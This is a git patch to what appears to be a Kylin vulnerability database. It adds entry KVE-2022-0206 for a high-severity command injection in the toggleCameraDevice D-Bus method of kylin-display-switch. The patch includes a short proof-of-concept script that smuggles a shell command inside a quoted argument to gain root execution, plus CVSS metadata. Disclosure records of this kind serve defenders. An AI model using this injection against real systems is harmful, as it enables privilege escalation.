From fbbe5b3e32c127647385e8f7e31bb299c3ccaaf3 Mon Sep 17 00:00:00 2001
From: yangjipeng <yangjipeng@kylinos.cn>
Date: Fri, 21 Oct 2022 14:29:34 +0800
Subject: [PATCH] ADD KVE-2022-0206

---
 .../2022/KVE-2022-0206/poc.sh                 |  3 +++
 .../2022/yaml/KVE-2022-0206.yaml              | 19 +++++++++++++++++++
 vulnerability_list.yaml                       |  4 +++-
 3 files changed, 25 insertions(+), 1 deletion(-)
 create mode 100644 kve/kylin-display-switch/2022/KVE-2022-0206/poc.sh
 create mode 100644 kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml

diff --git a/kve/kylin-display-switch/2022/KVE-2022-0206/poc.sh b/kve/kylin-display-switch/2022/KVE-2022-0206/poc.sh
new file mode 100644
index 00000000..9595fcc6
--- /dev/null
+++ b/kve/kylin-display-switch/2022/KVE-2022-0206/poc.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+gdbus call --system --dest org.ukui.kds --object-path / --method org.ukui.kds.interface.toggleCameraDevice "1';id>/opt/1.txt;'"
+ls -l /opt/1.txt && cat /opt/1.txt
\ No newline at end of file
diff --git a/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml b/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml
new file mode 100644
index 00000000..d3512bf6
--- /dev/null
+++ b/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml
@@ -0,0 +1,19 @@
+id: KVE-2022-0206
+source: openKylin Community
+info:
+  name: org.ukui.kds服务的toggleCameraDevice方法存在命令注入漏洞。
+  severity: high
+  description: |
+    org.ukui.kds方法toggleCameraDevice接口存在命令注入漏洞。普通用户可以以root权限执行任意命令。
+  scope-of-influence:
+    kylin-display-switch< 3.0.13
+  reference:
+    - https://kylinos.cn/support/loophole/patch/1874.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: None
+    cwe-id: None
+    cnvd-id: None
+    kve-id: KVE-2022-0206
+  tags: kve2022,dbus
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 3a166de8..2d3b76a6 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -27,4 +27,6 @@ kve:
     - KVE-2022-0207
     - KVE-2022-0210
   youker-assistant:
-    - KVE-2022-0205
\ No newline at end of file
+    - KVE-2022-0205
+  kylin-display-switch:
+    - KVE-2022-0206
\ No newline at end of file
-- 
Gitee